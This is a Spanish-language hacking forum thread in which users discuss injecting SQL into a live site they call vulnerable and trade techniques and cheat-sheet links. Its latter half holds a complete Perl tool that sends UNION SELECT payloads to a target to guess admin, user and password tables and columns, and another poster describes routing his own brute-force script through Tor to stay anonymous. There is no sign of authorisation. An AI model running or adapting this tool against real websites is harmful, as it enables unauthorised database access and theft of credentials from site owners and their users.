Buenas!

Bueno, siempre he tenido "apartado" el tema de sql injection (por pereza :p) dándole prioridad a otras cosas, pero bueno, creo que ya es hora de ponerme...

asi que últimamente he estado leyendo bastante y tal, y haciendo pruebas por ahí...

bueno, el problema me ha surgido, al encontrarme un sitio que es vulnerable, y que usa MSSQL, pero que no soy capaz de avanzar nada... :S

veamos, digamos que la página vulnerable es esta:

dado que si inserto una simple comilla, me tira esto:

de ahí deduzco que es vulnerable, y que la sentencia SQL debe ser algo como...

donde el % significa que 0 o más caracteres a continuación del id_torneo, hasta aquí bien...

intento algo como:

por lo que parece que el having se lo pasa por el forro...
intento meter algún paréntesis por si en el Where lo hubiera o algo...:

he probado con comillas dobles, con puntos y coma en vez del doble guión...y no llego a nada en claro :S

lo "máximo" que he conseguido es sacar otro tipo de error (con ; en vez de --) a parte de los 2 que puse antes:


alguna sugerencia/idea/recomendación ??¿¿

gracias y salu2 a todos

vale, voy a intentar con Union, pero he hecho unas cuantas pruebas, y el asunto está en que no se como colocar la dichosa comita:'  para que no me tire error...
al igual que antes con el having, he probado con: ', ", ), ; , -- , ...

pero nada, lo ponga como lo ponga, error de sintaxis o similares...

 

lo que creo que me está dando problemas es el maldito: %


en este caso de arriba, inserté una comilla simple, y el OR 1=1, pero siempre aparece el %...y por más que busco no encuentro algo tipo: -- , que sirva para comentar el resto... y si pongo un punto y coma después de lo que inyecto, da error, porque dice que hay caracteres después de la sentencia sql..probé a poner el null byte despues del punto y coma, pero ni así...

 

La manera de lidiar en estos casos es utilizar el resto de la sentencia como parte de tu inyeccion, en este caso en Access un SELECT debe si o si contener una tabla, busca una tabla por adivinación y luego cuando inyectas pones una condición que incluya la %.
Te tiro un ejemplo:

-Aah y por cierto, aca te dejo algunas páginas que hablan de este tipo de inyecciones:
http://www.xuexi123.net/chm/MS%20Access%20SQL%20Injection%20Cheat%20Sheet.htm
http://seclists.org/pen-test/2003/May/0074.html

bueno, me he hecho un mini-script en bash, porque es un toston andar palabra por palabra a ver si suena la flauta , asi que lo he automatizado un poco

el script pide la url donde se quiere inyectar (incluyendo variable, con el =, pero sin valor), un diccionario a usar para el bruteforce, un archivo de salida donde mostrar los resultados, y opcionalmente un trozo de sentencia sql para validar la sentencia completa (vamos, lo que me puso tomrian en su post!:
)

Y a continuación, pues básicamente se dedica a inyectar, y a recoger los "errores" tirados por la inyección en el fichero de log

Por cierto, está programado para que use algún server socks (en mi caso Tor), para anonimizar nuestra consulta, ya que es bastante canteosa... :p

no es nada eficiente, asi que esta un buennnnnnn rato, pero a mi por lo menos me ha funcionado

os pego el code, si alguien le apetece mejorarlo (ya que empeorarlo creo que es imposible :p), tiene total libertad, pero si lo haceis, me gustaría que me avisarais (más que nada para la próxima vez tener alguna herramienta decente y no esta basurilla )


salu2

Hola bro si con el Null byte es para anular la inyeccion me olvide de comentarte.. eso. Y habia hecho uno tambien para encontrar las tablas en perl pero esta maso no mas le faltaba mucho mas cosas y deje a media. Pero para la pagina que estaba auditando me resulto perfecto...

Access Injection SQL

#!/usr/bin/perl 
use IO::Socket;
$ban=0;
@nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','accesos',
	  'name','names','nombre','nombres','member','members','admin_table',
	  'miembro','miembros','membername','admins','administrator','sign',
	  'administrators','passwd','password','passwords','pass','Pass',
	  'tAdmin','tadmin','user_password','usuarios','user_passwords','user_name','user_names',
	  'member_password','mods','mod','moderators','moderator','user_email',
	  'user_emails','user_mail','user_mails','mail','emails','email','address',
	  'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
	  'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
	  'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',
	  'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
	  'sistema_usuario','sistema_password','contrase�a','auth','key','senha','signin',
	  'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','club_authors',
      'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',
      'membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup',
      'associated','accnt','customers','customer','membres','administrateur','utilisateur',
      'tuser','tusers','utilisateurs','password','amministratore','god','God','authors','wp_users',
      'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',
	  'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
@nombrecolumna=('emailAdmin',
		  'passAdmin','clave','admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
          'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
          'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author','user_login',
          'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
          'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
          'user_pwd','u_pass','clave','usuario','nom_usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username','senha','MEMBER','Clave_de_acceso','passwordAdmin','nameAdmin','loginAdmin','emailAdmin',
		  'passAdmin','IdAdmin' ,'nameAdmin' ,'emailAdmin','passswordAdmin');
 
 
sub socket{
		    my $inyec= shift;
			$socket = new IO::Socket::INET(
			PeerAddr => $host,
			PeerPort => 'http(80)',
			Proto => 'tcp') || die "[-] No se ha podido conectar a $host";
			print $socket "GET " .$path.$inyec.$tabla. " HTTP/1.0\r\n";
			print $socket "HOST:$host\r\n";
			print $socket "\n\n";
			if ($ban ==1){
			print "------------------------$tabla---------------------------------------\n";}
			return $socket;
		  }
 
if (!@ARGV[1]) {
      print "=======================================================		\n";
      print "	Injection AIS V 1.0 beta by MagnoBalt \n\n";
      print "	use perl $0 www.pagina.com.ar /noticia.php?id=\n\n";
	  print "	AIS:Acces Injection SQL \n";
      print "=======================================================		\n";
      exit(0);
      }
$host =$ARGV[0];
$path=$ARGV[1];
print "\n[-]Buscando Tablas		\n";
$iny="-1+UNION+SELECT+0+FROM+";
#print "antes de la funcion valor $iny\n";
foreach $tabla(@nombretabla)	{ 
  chomp($tabla);   
  #empuezo a guardar linea por linea el source en $response
  $socket=&socket($iny);
  while (<$socket>) {$response .= "$_ "}
  if($response=~/The number of columns in the two selected tables or queries of a union query do not match/ || $response=~/ero de columnas de las dos tablas o consultas seleccionadas para una consulta de uni&#38;#243;n no coincide/)
					{
				print "[+]Tabla $tabla FOUND\n"; 
				$tabla_aux=$tabla;
				    }
#print $response;
$response="";#limpio la variable
}#cierrre foreach
#buscamos numeros de columnas
print "[-]Buscando numeros de columnas\n";
print "[-]Ingrese Maximo con cual intentar \n";
$col.=<STDIN>;
chomp($col);
print "[-]Buscando..\n";
$columna=1;
while ($columna <= $col) {
	$union.=','.$columna;
	$iny="-1+UNION+SELECT+0".$union."+FROM+".$tabla_aux;
	$socket=&socket($iny);
	while (<$socket>) { $response .= "$_ "}
	#print $response;  
		if ($response=~/The number of columns in the two selected tables or queries of a union query do not match/ || $response=~/ero de columnas de las dos tablas o consultas seleccionadas para una consulta de uni&#38;#243;n no coincide/) 
					{
					print "[!] Fallo intento columna $columna\n";
					}
					else {
					$col_aux=$columna;
					$columna++;
					print "[+]La Web Posee $columna columnas\n ";
					print "$ARGV[0]$ARGV[1]$iny\n";
					$columna = $col;#fuerzo la salida del while. 
					}
	$response="";#limpio la variable
	$columna++;
	}	
#Bruteando las columnas
print "[-]Bruteando las columnas\n";
print "[-]Ingrese Tabla a la cual brutear:\n";
$tabla_aux="";
$tabla_aux.=<STDIN>;
chomp($tabla_aux);
$i=1;
 
while($i <= ($col_aux-1)) {#obtengo columnas menos una
    $cant.=','.$i;
     $i++;
      }
foreach $column(@nombrecolumna){
   chomp($column);
   $iny="-1+UNION+SELECT+0".$cant.",".$column."+FROM+".$tabla_aux;
   $socket=&socket($iny);
		while (<$socket>) { $response .= "$_ "}
		  if ($response=~/No value given for one or more required parameters/ || $response=~/80040e10/) {
		    }
		  else{
		    print "[+] Columna $column encontrada\n";
		      }
$response="";	
  }
 
 
 
 
 
close $socket;
exit(0);